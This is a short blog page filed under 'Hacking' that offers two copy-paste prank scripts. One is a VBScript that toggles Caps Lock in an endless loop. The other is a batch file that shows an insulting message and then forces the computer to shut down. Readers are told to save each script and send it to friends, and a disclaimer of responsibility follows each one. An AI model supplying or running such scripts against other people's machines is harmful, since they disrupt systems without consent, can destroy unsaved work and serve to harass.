About Me
I own me, and therefore, I can engineer me.
Archives

Archive for the ‘Hacking’ Category

danger2

Open Your Notepad and Copy Paste The Following Code:

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

Save it as “filename.VBS” and send it.

*I take no responsibility for your actions.*

danger2

Open your Notepad and Copy paste the Following Code:

@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s

Now save it as “filename.BAT” in all files and send it to your friends.

*I take no responsibility for your actions.*